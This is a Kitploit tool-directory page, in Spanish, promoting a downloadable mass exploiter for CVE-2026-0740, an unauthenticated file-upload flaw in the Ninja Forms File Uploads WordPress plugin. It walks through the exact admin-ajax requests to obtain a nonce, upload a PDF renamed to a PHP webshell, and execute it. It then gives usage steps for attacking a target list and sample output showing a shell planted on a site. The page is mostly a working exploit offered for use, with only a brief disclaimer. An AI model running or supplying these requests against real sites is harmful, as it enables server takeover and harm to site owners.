Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0740 — Explotador masivo automatizado para CVE-2026-0740, una subida arbitraria de archivos sin autenticación en el plugin Ninja Forms File Uploads, que permite la ejecución remota de código mediante subidas manipuladas. | Kitploit
Herramientas/GitHubGitHub/xshadow-here/cve-2026-0740
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubxshadow-here/cve-2026-0740

CVE-2026-0740

Explotador masivo automatizado para CVE-2026-0740, una subida arbitraria de archivos sin autenticación en el plugin Ninja Forms File Uploads, que permite la ejecución remota de código mediante subidas manipuladas.

Ver Repositorio
3hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 Subida de Archivos Arbitraria No Autenticada.

Descripción :

El plugin Ninja Forms - File Uploads para WordPress es vulnerable a la subida de archivos arbitraria no autenticada debido a la falta de validación del tipo de archivo y a la falta de comprobaciones de capacidades en la función 'NF_FU_AJAX_Controllers_Uploads::handle_upload' en todas las versiones hasta, e incluyendo, la 3.3.26

Esta falla permite a atacantes no autenticados:

  • Generar un nonce válido para CUALQUIER field_id.
  • Subir archivos arbitrarios mediante la técnica de evasión de listas blancas.
  • Forzar el renombrado del lado del servidor de una extensión permitida (.pdf) a una extensión PHP.
  • El webshell subido se almacenará en: → /wp-content/uploads/ninja-forms/tmp/
  • Lograr Ejecución Remota de Código (RCE) en el servidor afectado.

INFO : CVE-2026-0740

~ Puntuación CVSS: 9.8 (Crítico)

~ Versiones Afectadas: <= 3.3.26

  • Investigador : Sélim Lanouar-(whattheslime)

Vector de Ataque

root@kitploit:~
Paso 1: Obtener Nonce 
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Datos: action=nf_fu_get_new_nonce&field_id=7&form_id=7

Respuesta: {"success":true,"data":{"nonce":"7a850757a1"}}

              │
              ▼

Paso 2: Subir Archivo Disfrazado + Renombrar a PHP
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Datos:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (extensión permitida)
- doc_pdf=shadow.php (destino del renombrado)

              │
              ▼

Paso 3: El Servidor Almacena el Archivo Malicioso
─────────────────────────────────────
Ubicación: /wp-content/uploads/ninja-forms/tmp/shadow.php
Contenido: Shell PHP (uploader / webshell)

              │
              ▼

Paso 4: Ejecutar el archivo subido
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ Ejecutar webshell
→ Toma de control total del servidor
root@kitploit:~
- Conclusiones de los experimentos de campo:

1. El endpoint `nf_fu_get_new_nonce` devuelve un nonce válido sin comprobar la existencia del campo
   → Sin validación de los parámetros `field_id` y `form_id` (CUALQUIER ID aleatorio funciona)

2. Fallo lógico crítico en la funcionalidad de renombrado
   → El plugin acepta el nombre de archivo proporcionado por el usuario mediante el parámetro POST
   → Sin validación de la extensión final del archivo después del renombrado

3. El archivo subido aterriza directamente en un directorio accesible desde la web
   → /wp-content/uploads/ninja-forms/tmp/

4. El propietario de esta herramienta es muy guapo

Características :

  • Obtención automática del nonce
  • Explotación con ID por defecto
  • Manejo de errores
  • Guardado automático de resultados en shell.txt

Uso :

  • asegúrate de que el nombre del archivo sea list.txt y que esté en el directorio
  • python/python3 shadow.py

Salida :

root@kitploit:~
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
 ╰┈➤ Visualización de respuesta completa

[+] Cargados 100 objetivos

[1/100]
😈 [FRISKA RESEARCHER] Ataque a: https://example.com
[*] Obteniendo nonce...
[*] Estado HTTP: 400
[*] Respuesta: 0
[-] Error HTTP: 400

[2/100]
😈 [FRISKA RESEARCHER] Ataque a: https://www.test.com
[*] Obteniendo nonce...
[*] Estado HTTP: 200
[*] Respuesta: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Subiendo shell...
[*] Respuesta de subida: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
🔥 SUBIDOR DE SHELL: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================

Esta herramienta es solo para fines educativos y de pruebas de seguridad.

El uso no autorizado de sistemas que no te pertenecen o para los que no tienes permiso de prueba es ilegal.

Descargar herramienta